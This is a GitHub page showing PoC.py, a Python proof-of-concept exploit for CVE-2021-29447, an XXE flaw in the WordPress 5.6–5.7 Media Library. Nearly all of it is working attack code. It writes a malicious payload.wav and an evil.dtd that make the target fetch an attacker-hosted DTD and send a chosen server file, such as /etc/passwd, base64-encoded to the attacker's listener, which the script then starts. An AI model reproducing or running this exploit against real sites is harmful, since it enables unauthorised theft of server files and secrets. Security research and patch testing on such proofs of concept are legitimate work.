-
Notifications
You must be signed in to change notification settings - Fork 1
/
PoC.py
78 lines (63 loc) · 2.76 KB
/
PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import os
import sys
import argparse
def banner():
print('''
╔═╗╦ ╦╔═╗
║ ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023
═══════════════════════════════════════════════════════════════════════════
[*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
[*] Affected versions: Wordpress 5.6 - 5.7
[*] Patched version: Wordpress 5.7.1
[*] Installation version: PHP 8
═══════════════════════════════════════════════════════════════════════════
''')
def main():
#Arguments
parser = argparse.ArgumentParser(
epilog="\tExample: \r\npython3 " + sys.argv[0] + " -l 10.0.2.15 -p 8000 -f /etc/passwd")
parser.add_argument(
"-l", "--lhost",
dest="lhost",
help="your server ip address e.g. 10.0.2.15"
)
parser.add_argument(
"-p", "--port",
dest="port",
help="your server port e.g. 1337"
)
parser.add_argument(
"-f", "--file",
dest="file",
help="system file to read e.g. /etc/passwd"
)
args = parser.parse_args()
if len(sys.argv) < 2:
parser.print_usage()
sys.exit(1)
lhost = args.lhost
port = args.port
sysfile = args.file
# Content of the malicious wav file (payload.wav)
payload = f"RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://{lhost}:{port}/evil.dtd'>%remote;%init;%trick;]>\x00"
# Content of the malicious dtd (evil.dtd)
evil_dtd = f'''<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource={sysfile}">
\n<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://{lhost}:{port}/?p=%file;'>" >'''
if lhost and port and sysfile:
# Creating the payload.wav file
with open("payload.wav", "w", encoding="latin-1") as payload_file:
payload_file.write(payload)
print('[+] payload.wav was created.')
# Creating the evil.dtd file
with open("evil.dtd", "w") as dtd_file:
dtd_file.write(evil_dtd)
print('[+] evil.dtd was created.')
print('[+] manually upload the payload.wav file to the Media Library.')
print('[+] wait for the GET request.\n')
# Starting the local http server
os.system(f'php -S 0.0.0.0:{port}')
if __name__ == '__main__':
banner()
main()